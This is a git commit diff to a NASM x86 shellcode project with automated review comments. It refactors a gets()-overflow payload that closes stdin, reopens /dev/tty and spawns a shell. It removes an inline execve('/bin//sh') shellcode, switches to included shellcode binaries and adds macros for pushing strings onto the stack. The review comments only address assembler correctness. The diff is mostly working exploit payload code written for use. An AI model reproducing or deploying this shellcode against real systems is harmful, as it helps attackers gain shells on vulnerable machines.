
Commit 06eda48

committed
added a macro that makes pushing strings on the stack easy
1 parent 1d90d41 commit 06eda48


2 files changed

+74
-15
lines changed


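--- a/getsShellcode/getsShellcode.s
+++ b/getsShellcode/getsShellcode.s
@@ -3,32 +3,30 @@
 BITS 32
 
 %include "short32.s"
+%include "syscall.s"
 global main
 
 main:
 _close:
 xor eax,eax
 xor ebx,ebx
-mov al,close
-int 0x80 ;close stdin
+SYSTEM_CALL(close) ;close(STDIN_FILENO)
 tty:
 push ebx
 push 0x7974742f
 push 0x7665642f
 mov ebx,esp ;/dev/tty
 xor ecx,ecx
 mov cl,2 ;O_RDRW
-mov al,open
-int 0x80 ;open("/dev/tty",O_RDRW);
-
+SYSTEM_CALL(open) ;open("/dev/tty",O_RDRW);
+
 ;; Any local shellcode here
-sh:
-xor eax,eax
-push eax
-push 0x68732f2f
-push 0x6e69622f
-mov ebx,esp
-xor edx,edx
-xor ecx,ecx
-mov al,execve
-int 0x80
+
+%define EMULATOR
+%ifdef EMULATOR
+;; shell emulating shellcode
+incbin "../32shellEmulator/shellcode"
+%else
+;; ordinary shellcode (/bin/sh)
+incbin "../32bitLocalBinSh/shellcode"
+%endif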
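Review bot: `%define EMULATOR` on new line 25 is unconditional, so the `%ifdef EMULATOR` on the next line is always true and the `%else` branch on lines 29–31 can never be selected from this source. If the variant is meant to be chosen at build time, leave the `%define` out of the file and supply the symbol with `-DEMULATOR` when assembling, so the `%else` path becomes reachable again. `SYSTEM_CALL` comes from the newly included `syscall.s`, which is outside this diff, so whether it leaves `ebx`/`ecx` intact the way the `mov al,…`/`int 0x80` pairs it replaces did cannot be confirmed here; a one-line comment next to the `%include` stating which registers the macro clobbers would make that contract visible at the call sites.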

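--- a/include/util.s
+++ b/include/util.s
@@ -15,5 +15,66 @@
 (((x) & 0xff000000) >> 24))
 
 %define htons(x) ((((x) & 0xff00) >> 8) | (((x) & 0x00ff) << 8))
+
 %define ip(a,b,c,d) htonl(a << 24 | b << 16 | c << 8 | d) ; ip(127,0,0,1)
+
+%define htonx(x) \
+%if __BITS__==16 \
+htons(x) \
+%elif __BITS__==32 \
+htonl(x) \
+%elif __BITS__==64 \
+htonq(x) \
+%elif \
+%error "__BITS__ is not 16, 32 or 64" \
+%endif
+
+%macro str_null_check 1
+%assign word_length __BITS__/8
+%strlen len_arg %1
+%if len_arg % word_length!=0
+%fatal "Make string a multiple of the word length"
+%endif
+%endmacro
+
+%macro str_null_check 2
+%assign word_length %2/8
+%strlen len_arg %1
+%if len_arg % word_length!=0
+%fatal "Make string a multiple of the word length"
+%endif
+%endmacro
+
+;; The PUSH_STRING macros don't null terminate the string
+;; arguments must be known at assemble time
+
+
+%macro PUSH_STRING 2 ;string, bitcount
+str_null_check %1 %2
+%assign word_length %2/8
+%strlen string_length %1
+%assign num_pushes string_length/word_length
+%assign index string_length
+%rep num_pushes
+%substr slice %1 index-word_length+1,word_length
+%assign index index-word_length
+push slice
+%warning push slice
+%endrep
+%endmacro
+
+%macro PUSH_STRING 1 ;string
+str_null_check %1
+%assign word_length __BITS__/8
+%strlen string_length %1
+%assign num_pushes string_length/word_length
+%assign index string_length
+%rep num_pushes
+%substr slice %1 index-word_length+1,word_length
+%assign index index-word_length
+push slice
+%warning push slice
+%endrep
+%endmacro
+
 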
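Review bot: The `htonx` definition on new lines 21–30 places a `%if`/`%elif` chain inside a single `%define` body joined by `\` continuations, so the conditional is most likely never evaluated as directives, and the bare `%elif \` on line 28 has no condition and should be `%else` in any case; the conventional shape keeps the conditional outside the define (`%if __BITS__==16` / `%define htonx(x) htons(x)` / `%elif __BITS__==32` …). On new line 53, `str_null_check %1 %2` hands the macro one space-separated argument rather than two, so it should read `str_null_check %1, %2` to reach the two-parameter form. The `%warning push slice` on lines 62 and 76 fires on every expansion; remove it or guard it with `%ifdef DEBUG`. The one-argument `PUSH_STRING` duplicates the two-argument body and could simply expand to `PUSH_STRING %1, __BITS__`, and since `str_null_check` verifies word-length alignment rather than null termination, a name such as `str_word_check` plus a header comment `;; asserts the string length is a multiple of the word size in bytes` would match what it actually does.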
